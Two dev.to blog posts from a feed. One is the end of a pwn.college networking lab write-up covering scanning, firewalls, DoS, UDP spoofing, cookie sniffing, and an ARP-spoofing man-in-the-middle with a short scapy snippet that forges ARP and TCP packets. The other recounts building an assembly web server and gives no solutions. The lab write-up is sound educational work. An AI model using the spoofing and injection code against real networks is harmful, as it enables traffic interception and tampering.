&lt;strong&gt;Shutdown&lt;/strong&gt;: Properly closing connections (half-closed vs. fully closed)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Listen&lt;/strong&gt;: Creating a server that accepts incoming connections&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The key insight was understanding the TCP state machine and how &lt;code&gt;shutdown()&lt;/code&gt; differs from &lt;code&gt;close()&lt;/code&gt; - &lt;code&gt;shutdown()&lt;/code&gt; allows graceful half-closed connections while &lt;code&gt;close()&lt;/code&gt; tears down the entire socket.&lt;/p&gt;

&lt;h3&gt;
  
  
  Scan 1 &amp;amp; 2: Port Scanning
&lt;/h3&gt;

&lt;p&gt;These challenges introduced me to network reconnaissance:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;TCP Connect scanning vs. SYN scanning&lt;/li&gt;
&lt;li&gt;Understanding service identification through banner grabbing&lt;/li&gt;
&lt;li&gt;Handling timeouts and connection refusals&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I learned that a SYN scan (&lt;code&gt;nmap -sS&lt;/code&gt;) is faster and stealthier than a full TCP connect scan because it never completes the handshake.&lt;/p&gt;

&lt;h3&gt;
  
  
  Monitor 1 &amp;amp; 2: Traffic Analysis
&lt;/h3&gt;

&lt;p&gt;Using &lt;code&gt;tcpdump&lt;/code&gt; and Wireshark, I learned to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Capture packets with filters (&lt;code&gt;host&lt;/code&gt;, &lt;code&gt;port&lt;/code&gt;, &lt;code&gt;tcp&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Analyze TCP flags (SYN, ACK, RST, FIN)&lt;/li&gt;
&lt;li&gt;Identify suspicious patterns in network traffic&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;code&gt;tshark&lt;/code&gt; command became my best friend: &lt;code&gt;tshark -r capture.pcap -Y "tcp.flags.syn == 1"&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Sniffing Cookies
&lt;/h3&gt;

&lt;p&gt;This was my first taste of how dangerous unencrypted traffic can be. By sniffing HTTP traffic, I could extract session cookies and impersonate users. This drove home why HTTPS is essential for any authentication.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 2: Network Control
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Network Configuration
&lt;/h3&gt;

&lt;p&gt;Understanding IP addressing, subnet masks (&lt;code&gt;/24&lt;/code&gt;, &lt;code&gt;/16&lt;/code&gt;), routing tables, and default gateways. The &lt;code&gt;ip&lt;/code&gt; command replaced the deprecated &lt;code&gt;ifconfig&lt;/code&gt; in my toolkit.&lt;/p&gt;

&lt;h3&gt;
  
  
  Firewall 1, 2, 3
&lt;/h3&gt;

&lt;p&gt;These challenges taught &lt;code&gt;iptables&lt;/code&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Firewall 1&lt;/strong&gt;: Basic filtering (ACCEPT/DROP rules)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Firewall 2&lt;/strong&gt;: Stateful inspection (tracking established connections)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Firewall 3&lt;/strong&gt;: NAT and port redirection&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Key rules I learned:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;iptables &lt;span class="nt"&gt;-A&lt;/span&gt; INPUT &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;--dport&lt;/span&gt; 22 &lt;span class="nt"&gt;-j&lt;/span&gt; ACCEPT
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; INPUT &lt;span class="nt"&gt;-m&lt;/span&gt; state &lt;span class="nt"&gt;--state&lt;/span&gt; ESTABLISHED,RELATED &lt;span class="nt"&gt;-j&lt;/span&gt; ACCEPT
iptables &lt;span class="nt"&gt;-t&lt;/span&gt; nat &lt;span class="nt"&gt;-A&lt;/span&gt; PREROUTING &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;--dport&lt;/span&gt; 80 &lt;span class="nt"&gt;-j&lt;/span&gt; REDIRECT &lt;span class="nt"&gt;--to-port&lt;/span&gt; 8080
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Denial of Service 1, 2, 3
&lt;/h3&gt;

&lt;p&gt;These challenges demonstrated various DoS attack vectors:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;SYN flood&lt;/strong&gt;: Exhausting connection queues with incomplete handshakes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;UDP flood&lt;/strong&gt;: Overwhelming bandwidth with stateless packets&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Application layer attacks&lt;/strong&gt;: Slowloris-style attacks keeping connections open&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Mitigation techniques included SYN cookies, rate limiting, and connection timeouts.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 3: Protocol Deep Dive
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Ethernet
&lt;/h3&gt;

&lt;p&gt;Understanding MAC addresses, ARP, and the data link layer. The Ethernet frame structure (destination MAC, source MAC, EtherType, payload, FCS) became second nature.&lt;/p&gt;

&lt;h3&gt;
  
  
  IP
&lt;/h3&gt;

&lt;p&gt;IPv4 header dissection: version, IHL, TOS, total length, identification, flags, fragment offset, TTL, protocol, checksum, source/destination addresses. The TTL field's role in preventing routing loops was particularly interesting.&lt;/p&gt;

&lt;h3&gt;
  
  
  TCP
&lt;/h3&gt;

&lt;p&gt;The Transmission Control Protocol's reliability mechanisms:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Sequence and acknowledgment numbers&lt;/li&gt;
&lt;li&gt;Windowing and flow control&lt;/li&gt;
&lt;li&gt;Retransmission and timeout handling&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  TCP Handshake
&lt;/h3&gt;

&lt;p&gt;The three-way handshake (SYN, SYN-ACK, ACK) and four-way teardown (FIN, ACK, FIN, ACK). I learned to craft handshake packets using &lt;code&gt;scapy&lt;/code&gt; and observe state transitions.&lt;/p&gt;

&lt;h3&gt;
  
  
  UDP
&lt;/h3&gt;

&lt;p&gt;Connectionless, unreliable, but fast. UDP's simplicity makes it ideal for DNS, DHCP, and streaming. No handshake means lower latency but no delivery guarantees.&lt;/p&gt;

&lt;h3&gt;
  
  
  UDP Spoofing 1-4
&lt;/h3&gt;

&lt;p&gt;These challenges escalated in complexity:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Basic spoofing&lt;/strong&gt;: Forging source IP addresses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Response spoofing&lt;/strong&gt;: Injecting fake replies&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Amplification attacks&lt;/strong&gt;: Using UDP's stateless nature for reflection attacks (e.g., DNS amplification)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sequence prediction&lt;/strong&gt;: While harder with UDP, understanding how to craft valid responses&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Phase 4: The Big Leagues
&lt;/h2&gt;

&lt;h3&gt;
  
  
  ARP
&lt;/h3&gt;

&lt;p&gt;The Address Resolution Protocol maps IP addresses to MAC addresses. Its stateless, trust-based nature makes it vulnerable to spoofing. I learned to send gratuitous ARP replies and how &lt;code&gt;arp -a&lt;/code&gt; can reveal the ARP cache.&lt;/p&gt;

&lt;h3&gt;
  
  
  Intercept
&lt;/h3&gt;

&lt;p&gt;This challenge required passive interception - capturing traffic between two hosts without modifying it. Using &lt;code&gt;tcpdump&lt;/code&gt; or &lt;code&gt;scapy&lt;/code&gt; in promiscuous mode, I learned to sniff packets not destined for my MAC address.&lt;/p&gt;

&lt;h3&gt;
  
  
  Man-in-the-Middle
&lt;/h3&gt;

&lt;p&gt;The final boss. Here's what I executed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ARP spoofing to redirect traffic
&lt;/span&gt;&lt;span class="n"&gt;arp_spoof&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;ARP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;op&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pdst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;target_ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;hwdst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;target_mac&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;psrc&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;spoof_ip&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nf"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;arp_spoof&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;loop&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;inter&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Packet interception and modification
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;process&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;Raw&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sa"&gt;b&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;command: &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# Forge a response with "flag" instead of "echo"
&lt;/span&gt;        &lt;span class="n"&gt;forged&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nc"&gt;TCP&lt;/span&gt;&lt;span class="p"&gt;(...)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nc"&gt;Raw&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;b&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;flag&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;forged&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The breakthrough came when I realized I didn't need IP forwarding - with ARP spoofing and active packet injection, I could intercept and modify traffic directly.&lt;/p&gt;

&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Network security is layered&lt;/strong&gt; - vulnerabilities at any layer (ARP at L2, IP at L3, TCP/UDP at L4) can compromise higher layers.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Trust is dangerous&lt;/strong&gt; - ARP, UDP, and even TCP sequence numbers (in older implementations) rely on trust that can be abused.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Encryption isn't optional&lt;/strong&gt; - Many challenges (especially Sniffing Cookies) showed why plaintext protocols are unacceptable.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Tools are powerful&lt;/strong&gt; - &lt;code&gt;scapy&lt;/code&gt; for packet crafting, &lt;code&gt;tcpdump&lt;/code&gt; for capture, &lt;code&gt;iptables&lt;/code&gt; for firewall rules, &lt;code&gt;nmap&lt;/code&gt; for scanning.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Defense requires depth&lt;/strong&gt; - A single countermeasure isn't enough. ARP spoofing is mitigated by static ARP entries, DAI, and network segmentation.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;This track transformed how I see network traffic. Every packet tells a story - who's talking, what they're saying, and whether we can trust them. The MITM challenge pulled everything together: I had to understand ARP to redirect traffic, TCP to maintain sequence/ack numbers, packet crafting to forge responses, and protocol analysis to know when to inject.&lt;/p&gt;

&lt;p&gt;For anyone learning network security, I can't recommend pwn.college enough. These challenges are well-designed, progressive, and brutally educational.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;All challenges completed on pwn.college's platform. Thanks to the Arizona State University team for creating such an excellent learning resource.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>cybersecurity</category>
      <category>networking</category>
      <category>programming</category>
    </item>
    <item>
      <title>How I Learned Syscalls by Building a Web Server on pwn.college</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sat, 16 May 2026 14:43:55 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/how-i-learned-syscalls-by-building-a-web-server-on-pwncollege-2p8m</link>
      <guid>https://dev.to/hitanshugedam/how-i-learned-syscalls-by-building-a-web-server-on-pwncollege-2p8m</guid>
      <description>&lt;h3&gt;
  
  
  From Zero to Web Server
&lt;/h3&gt;

&lt;p&gt;No full solutions here. Just the journey, the lessons, and the honest truth.&lt;/p&gt;

&lt;h3&gt;
  
  
  A Note on Learning (and Honesty)
&lt;/h3&gt;

&lt;p&gt;Before I go any further: I'm not going to paste my solutions in this post.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://pwn.college" rel="noopener noreferrer"&gt;pwn.college&lt;/a&gt; is a learning platform. The challenges are meant to be solved, not copied. If I just dumped my assembly code here, I'd be robbing someone else of the chance to struggle, fail, debug, and eventually feel that incredible rush when the checker program finally says PASS.&lt;/p&gt;

&lt;p&gt;Also, I want to be completely transparent. Out of the 11 challenges in this module, there were &lt;strong&gt;fewer than 5&lt;/strong&gt; where I got so stuck that I reached for help from an AI. Not to generate full solutions, but to explain a syscall I didn't understand, or to help me reason through why something was failing. I still wrote every line of assembly myself. And every time I got help, I made sure I understood why the fix worked before moving on.&lt;/p&gt;

&lt;p&gt;The rest, the majority, I solved on my own, using &lt;code&gt;strace&lt;/code&gt;, &lt;code&gt;gdb&lt;/code&gt;, the man pages, and a lot of trial and error.&lt;/p&gt;

&lt;p&gt;Why am I telling you this? Because pretending I never needed help would be a lie. Getting stuck is normal. Asking for help, as long as you actually learn from it, is part of the process too. The goal isn't to be "pure." The goal is to understand.&lt;/p&gt;

&lt;p&gt;And I understand this material now. That's what matters.&lt;/p&gt;

&lt;p&gt;So instead of giving you code, I'm going to tell you what I learned. The concepts. The syscalls. The mistakes. The "aha!" moments. If you're working through the same dojo, this post will point you in the right direction, but you'll still have to do the work yourself.&lt;/p&gt;

&lt;h3&gt;
  
  
  Before the Web Server
&lt;/h3&gt;

&lt;p&gt;Before I ever wrote a single line of HTTP response in assembly, I had to learn how computers actually work.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://pwn.college" rel="noopener noreferrer"&gt;pwn.college&lt;/a&gt;'s Computing 101 dojo isn't gentle. It throws you into the deep end and expects you to swim. Before reaching the "Building a Web Server" module, I completed eight modules in order:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Your First Program&lt;/strong&gt; (5 challenges), How to make a program exit. Syscall 60, if you're counting.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Computer Memory&lt;/strong&gt; (7 challenges), Pointers are just numbers. Memory is just bytes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The Stack&lt;/strong&gt; (4 challenges), Push, pop, call, ret, how functions really work.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Software Introspection&lt;/strong&gt; (12 challenges), &lt;code&gt;strace&lt;/code&gt;, &lt;code&gt;ltrace&lt;/code&gt;, &lt;code&gt;gdb&lt;/code&gt;, watching programs from the outside.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output and Input&lt;/strong&gt; (6 challenges), &lt;code&gt;read&lt;/code&gt; and &lt;code&gt;write&lt;/code&gt; are all you need.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Control Flow&lt;/strong&gt; (7 challenges), Jumps, compares, loops, the logic of everything.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Assembly Assortment&lt;/strong&gt; (4 challenges), Bitwise ops, shifts, condition codes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Assembly Crash Course&lt;/strong&gt; (30 challenges), Pure x86-64 assembly. 30 of them.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Total before the web server: 75 assembly programs.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;By the time I reached "Building a Web Server," I had stared at register values until my eyes hurt. I had learned that &lt;code&gt;mov&lt;/code&gt; is not a copy, it's a transfer. I had earned the right to be confused, stuck, and then unstuck.&lt;/p&gt;

&lt;p&gt;So when I started the web server module, I wasn't starting from zero. I was starting from "I understand the stack, I understand syscalls, I understand that nothing is handed to me."&lt;/p&gt;

&lt;p&gt;And I still spent a lot of time on it.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Web Server Module: 11 Challenges
&lt;/h3&gt;

&lt;p&gt;Here's the journey, what each challenge taught me, without giving away the actual code.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 1: Exit
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Write a program that calls the &lt;code&gt;exit&lt;/code&gt; syscall with status 0.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; Every program needs an exit. The kernel doesn't know you're done unless you tell it. The syscall convention on x86-64 Linux is: syscall number in &lt;code&gt;rax&lt;/code&gt;, first argument in &lt;code&gt;rdi&lt;/code&gt;, then &lt;code&gt;syscall&lt;/code&gt;. That's the foundation everything else builds on.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Nowhere on this one. It's the warm-up.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 2: Socket
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Create a TCP socket for IPv4.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; You can't just write &lt;code&gt;AF_INET&lt;/code&gt; and &lt;code&gt;SOCK_STREAM&lt;/code&gt; in assembly, those are C macros. You have to find the actual integer values. I learned to &lt;code&gt;grep&lt;/code&gt; through &lt;code&gt;/usr/include&lt;/code&gt; to find them. Turns out &lt;code&gt;AF_INET&lt;/code&gt; is 2 and &lt;code&gt;SOCK_STREAM&lt;/code&gt; is 1. The &lt;code&gt;socket&lt;/code&gt; syscall returns a file descriptor that you'll use for everything else.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Nothing major. But it made me appreciate what C preprocessors actually do.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 3: Bind
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Attach my socket to port 80 so clients could find it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; &lt;code&gt;bind&lt;/code&gt; takes a pointer to a &lt;code&gt;sockaddr_in&lt;/code&gt; structure, 16 bytes of raw memory that you have to construct yourself. I learned what each field means: address family (2 bytes), port (2 bytes in network byte order, big-endian), IP address (4 bytes), and padding (8 bytes). Endianness matters: port 80 (&lt;code&gt;0x0050&lt;/code&gt;) becomes &lt;code&gt;0x5000&lt;/code&gt; when stored in memory.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; This was my first real wall. I kept getting &lt;code&gt;bind&lt;/code&gt; failures because I had the port byte order wrong. &lt;code&gt;strace&lt;/code&gt; and the &lt;code&gt;bind&lt;/code&gt; man page eventually saved me.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 4: Listen
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Turn my bound socket into a passive listener.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; A socket created with &lt;code&gt;socket()&lt;/code&gt; is "active", it expects to initiate connections. &lt;code&gt;listen()&lt;/code&gt; makes it "passive" so it can receive incoming connections. The backlog parameter tells the kernel how many pending connections to queue.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; I initially forgot that &lt;code&gt;listen&lt;/code&gt; needs to be called after &lt;code&gt;bind&lt;/code&gt; but before &lt;code&gt;accept&lt;/code&gt;. My program hung forever until I looked up the correct order.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 5: Accept
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Wait for a client to connect and get a new file descriptor for that client.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; &lt;code&gt;accept&lt;/code&gt; blocks, it puts your program to sleep until someone connects. That's actually good, the kernel handles the waiting efficiently. When a client connects, &lt;code&gt;accept&lt;/code&gt; returns a new file descriptor just for talking to that client. The original listening socket stays open for more connections.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; I accidentally overwrote my listening socket fd with the client fd and lost the ability to accept more connections. Had to carefully separate my register usage.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 6: Static Response
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Send a fixed HTTP response ("HTTP/1.0 200 OK\r\n\r\n") to any client that connects.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; This is where assembly stops being abstract. You can't just write &lt;code&gt;printf(...)&lt;/code&gt;. You have to put those bytes in memory yourself, one byte at a time. I also learned that HTTP uses &lt;code&gt;\r\n&lt;/code&gt; for line endings, and a blank line (&lt;code&gt;\r\n\r\n&lt;/code&gt;) separates headers from body.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Counting bytes. I miscounted the response length and the checker failed me because the response was truncated. Staring at hex dumps fixed it.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 7: Dynamic Response
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Parse the GET request, extract the file path, open that file, read its contents, and send them back.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; Parsing HTTP manually means scanning byte by byte. Find the space after "GET", find the next space after the path, null-terminate the path string. Then &lt;code&gt;open&lt;/code&gt; with &lt;code&gt;O_RDONLY&lt;/code&gt;, &lt;code&gt;read&lt;/code&gt; the file into a buffer, and &lt;code&gt;write&lt;/code&gt; the header plus file contents.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Off-by-one errors in finding the spaces. Also forgot to null-terminate the path string at first, so &lt;code&gt;open&lt;/code&gt; was getting garbage after the filename.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 8: Iterative GET Server
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Keep the server running after one request, handling multiple clients sequentially.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; One infinite loop. After handling a client and closing its fd, just jump back to &lt;code&gt;accept&lt;/code&gt;. The server stays alive forever. This is called an iterative server, one client at a time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; I forgot to close the client fd at the end of the loop. File descriptors leaked and eventually the server couldn't accept new connections.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 9: Concurrent GET Server
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Handle multiple clients at the same time using &lt;code&gt;fork()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; &lt;code&gt;fork()&lt;/code&gt; creates an exact copy of the running process. The parent gets the child's PID; the child gets 0. Parent closes the client fd and goes back to &lt;code&gt;accept&lt;/code&gt;. Child closes the listening socket and handles the request. Classic Unix pattern: parent listens, child handles.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Figuring out which process closes which file descriptor. Parent should never touch the request. Child should never call &lt;code&gt;accept&lt;/code&gt;. Getting this separation right took a few tries.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 10: Concurrent POST Server
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Handle POST requests by extracting the body and writing it to a file.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; POST requests have a body after the headers. To find it, scan for &lt;code&gt;\r\n\r\n&lt;/code&gt;, the blank line that separates headers from body. Calculate body length = total bytes read minus header size. Open the file with &lt;code&gt;O_WRONLY | O_CREAT&lt;/code&gt; (flags 1 and 64 combined = 65) and &lt;code&gt;write&lt;/code&gt; the body bytes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; This was the hardest challenge. The body parsing logic was tricky, scanning for four bytes in a row. I also kept miscalculating the body length. And there was a specific requirement from the checker about closing (or not closing) the client socket that took me a while to discover.&lt;/p&gt;

&lt;h4&gt;
  
  
  Challenge 11: Web Server
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What I had to do:&lt;/strong&gt; Combine GET and POST into a single concurrent server.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learned:&lt;/strong&gt; Check the first byte of the request: &lt;code&gt;'G'&lt;/code&gt; means GET, &lt;code&gt;'P'&lt;/code&gt; means POST. Branch to the right handler. Both send &lt;code&gt;200 OK&lt;/code&gt; when done. Both run inside &lt;code&gt;fork()&lt;/code&gt;. I moved the &lt;code&gt;200 OK&lt;/code&gt; response to the &lt;code&gt;.rodata&lt;/code&gt; section so I wasn't rebuilding it every time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where I got stuck:&lt;/strong&gt; Making sure the parent and child didn't step on each other. Clear separation of responsibilities was the key. By this point, I had enough confidence from the previous 10 challenges to put it all together myself.&lt;/p&gt;

&lt;h3&gt;
  
  
  After the Web Server: Debugging Refresher
&lt;/h3&gt;

&lt;p&gt;After building the web server, I completed Debugging Refresher (8 challenges). This module taught me how to properly inspect what I had built:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;strace&lt;/code&gt; to trace every syscall my server made to the kernel. Incredibly useful for seeing exactly where something failed.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;gdb&lt;/code&gt; for breakpoints, stepping through instructions, inspecting registers and memory.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;ltrace&lt;/code&gt; for library calls (though my server made none, pure syscalls only).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Without debugging skills, assembly is blind. With them, you can see everything.&lt;/p&gt;

&lt;h3&gt;
  
  
  What I Actually Learned
&lt;/h3&gt;

&lt;h4&gt;
  
  
  The most important lesson
&lt;/h4&gt;

&lt;p&gt;I spent a lot of time on these challenges. I don't remember every instruction I wrote. But I remember this: &lt;strong&gt;I can figure things out and make them work.&lt;/strong&gt;&lt;/p&gt;

